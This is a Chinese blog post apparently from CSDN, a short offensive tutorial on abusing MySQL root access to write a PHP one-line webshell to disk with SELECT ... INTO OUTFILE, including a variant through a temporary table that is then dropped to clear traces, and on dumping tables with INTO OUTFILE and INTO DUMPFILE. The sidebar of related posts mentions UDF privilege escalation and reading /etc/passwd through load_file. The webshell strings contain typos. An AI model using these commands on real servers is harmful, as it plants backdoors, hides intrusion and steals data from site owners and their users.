MYSQL数据库脱库写马写一句话

最新推荐文章于 2024-05-14 03:14:30 发布
最新推荐文章于 2024-05-14 03:14:30 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 笔记 文章标签: 数据库 安全漏洞 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010062917/article/details/105739807
版权

0x00 前提条件

权限: 必须是ROOT
secure_file_priv的限制
可以使用 mysql命令查询 show variables like '%secure%’;

secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

0x01 写入Websehll

  • 利用函数
  • - into dumpfile()
  • - into outfile()
  • - load_file()

01. 直接写入

注意:这个方法必须得是ROOT用户权限

  select '<php eval($_POST[shell])?>' into outfile 'c:\\shell.php'

02. 创建表单写入

1.先创建数据表

CREATE  table 'mysql'.'shell' ('webshell'  text not null)

2.向表单中写入一句话

insert Into  mysql.shell  values('<?php $eval($_POST[shell]);?>');

3.查询数据导出webshell

select 'webshell' from 'shell'  into outfile 'c:\\1.php'

4.删除表,清理痕迹。

drop table if exists 'shell'

0x02 脱库

0x1 Into outfile

select * from test into outfile '/tmp/test.txt'

0x2 Into dumpfile

 select * from test into dumpfile '/tmp/test.txt'

0x3 outfile 与dumpfile的脱裤区别

1.dumpfile只输出一行内容,outfile多行。
2.outfile函数在将数据写入到文件时会进行特殊格式转换 例如\n,则dumpfile则保持原数据格式。
在这里插入图片描述

WeUjie
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL马详解
jklbnm12的博客
08-14 1942
日志马 条件 1.全局变量general_log为ON MySQL的两个全局变量: general_log指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。 general_log_file 指的是日志的保存路径。 mysql> show global variables like "%general\_log%";+------------------+--------------------------------------------------------+|
一句话下tuo库
weixin_33890499的博客
03-15 91
条件限制不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。 这儿利用的是马儿的专家模式(自己代码)。 ini_set('display_errors', 1); set_time_limit(0); error_reporting(E_ALL); $connx = mysql_connect(":/var/tmp/mysql....
你的个人信息是如何被盗走的?MySQL脱库脱库的原理,怎么脱库脱库的步骤,一库三表六字段_数据脱库是什么意思
最新发布
2401_84970331的博客
05-14 1042
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
MYSQL数据库马讲解
qq_49422880的博客
04-01 2691
MYSQL数据库马讲解0x01 前言0x02 日志🐎0x03 into outfile🐎 0x01 前言   最近正好在上数据库的课程,比较详细地学习了数据库各个方面地知识。感觉解决了之前不少的疑惑,再吐槽一下(学校开数据库这门课开的太晚了!)   下面进行分析与讲解数据库入马的过程。 0x02 日志🐎 众所周知我们所有的数据库的都有一个存放日志的文件,这个文件可以会进行记录数据库的操作语句,也可能不会记录数据库的操作语句,这却决于两个全局变量: general_log==>日志保存状态,有
mysql 脱裤_mysql 脱裤(脱库)通用脚本
weixin_39987211的博客
01-18 639
TK:全面解密脱裤门内幕 --- hExIe Security Team...Mysql Database on Tables to Txt...This is a Php Example.#_E-mail:go_root@hotmail.com #_Author:HYrz--------------------------------------------------------Start M...
针对MYSQL数据注入时用到的 load_file()函数
dibodang1423的博客
05-16 255
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)...
教会你完全搞定MySQL数据库 轻松八句话
09-11
MySQL数据库是关系型数据库管理系统,广泛应用于各种规模的Web应用中。本文将教你如何轻松掌握MySQL数据库的基本操作,只需理解并实践以下八点,就能基本应对大部分数据库管理需求。 1. **连接MySQL**: 连接MySQL...
轻松八句话 教会你完全搞定MySQL数据库
10-10
MySQL数据库是全球最受欢迎的开源关系型数据库管理系统之一,它以其高效、可靠且易于学习的特点深受开发者喜爱。在本文中,我们将通过八条关键知识点,帮助你深入理解和掌握MySQL数据库的精髓,让你能够轻松应对各种...
浅谈MySQL数据库性能优化
12-14
 这里先引用一句话,从内存中读取一个数据的时间消耗是微秒级别,而从普通硬盘上读取一个数据是在毫秒级别,二者相差3个数量级。可见,想对MySQL数据库进行优化,合理调配缓存参数显得更为直接  表缓存  相关...
mysql 本地数据库如何从远程数据库导数据
01-19
操作过程:打开【终端】,直接输入以下内容,点回车即可 就这一句话哦! 用途:将远程服务器的数据库拷到本地。 Java代码 代码如下: mysqldump -h ‘114.212.111.123’ -uROSE -pxxxooo –opt –compress ITSM –...
mysql脱库_mysql 脱裤(脱库)通用脚本
weixin_34638776的博客
01-28 2317
TK:全面解密脱裤门内幕 --- hExIe Security Team...Mysql Database on Tables to Txt...This is a Php Example.#_E-mail:go_root@hotmail.com #_Author:HYrz--------------------------------------------------------Start M...
PHP+MySQL脱库
07-02
PHP+MySQL脱库,WEBSHELL
MySQL提权专用网马
05-10
先前我发布了一个用于MYSQL提权的UDF,不过好像不少朋友不是很明白它的使用,不断有人问我它的使用方法,有人干脆叫我个此UDF的专用PHP。说实话在我这个PHP之前就只学过点ASP,对PHP那是一窍不通,所以程序中不妥之处在所难免,高手不要见笑。PHP的比较笨,这里就不讲它怎么的了,直接讲它的使用。 一、功能: 利用MYSQL的自定义函数功能(再次声明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。 二、适用场合: 1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。 三、使用帮助: 第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接 第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误。 三、使用帮助: 第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。
MYSQL mssql脱裤
08-24
脱裤脚本 MYSQL mssql脱裤 脱网站数据必备
php mysql 软件直接连接脱裤
09-14
php mysql 软件直接连接脱裤,秒连接,过任何杀软,可以拖10T以上数据库
一句话专家模式”脱裤”
weixin_30394669的博客
08-22 79
条件限制不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。 这儿利用的是马儿的专家模式(自己代码)。 ini_set(‘display_errors’, 1); set_time_limit(0); error_reporting(E_ALL); $connx = mysql_connect(“:/var/tmp/mysql.sock”,...
mysql盲注脱裤_记一次猥琐的脱裤
weixin_35201989的博客
02-28 387
简介环境php+pdo+mysql+linuxFUCK IT因为是pdo,所以支持多行,一开始只用了时间盲注跑了用户表的列出来,然后可以通过多行语句执行updaet user set email=(select group_concat(table_name) from information_schema.columns where table_schema=database()) where ...
MySQL数据库及数据表的创建
qq_45013917的博客
01-22 567
MySQL数据库及数据表的创建
MySQL SQL 语句总结(一)脱离工具,命令行操作数据库
御剑长歌的博客
03-31 414
之前一直用Navicat对MySQL进行操作,感觉对sql的运用十分的少,今天记录下通过命令行操作MySQL的基本命令。 进入命令行 mysql -u root -p 注意这个如果path没有配置好 就必须进入mysql的Bin目录 输入密码 进入数据库 show databases; //查看所有数据库 查看当前使用的数据库 status //查看当前数据库状态 其中一行: c...
mysql数据库 - 单表查询(三)
06-28
MySQL数据库中的单表查询(三)可以使用以下语句实现: 1. SELECT DISTINCT 列名 FROM 表名; 这句话可以查询表中不重复的值。 2. SELECT 列名1, 列名2 FROM 表名 WHERE 条件; 这句话可以查询表中满足条件的记录...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值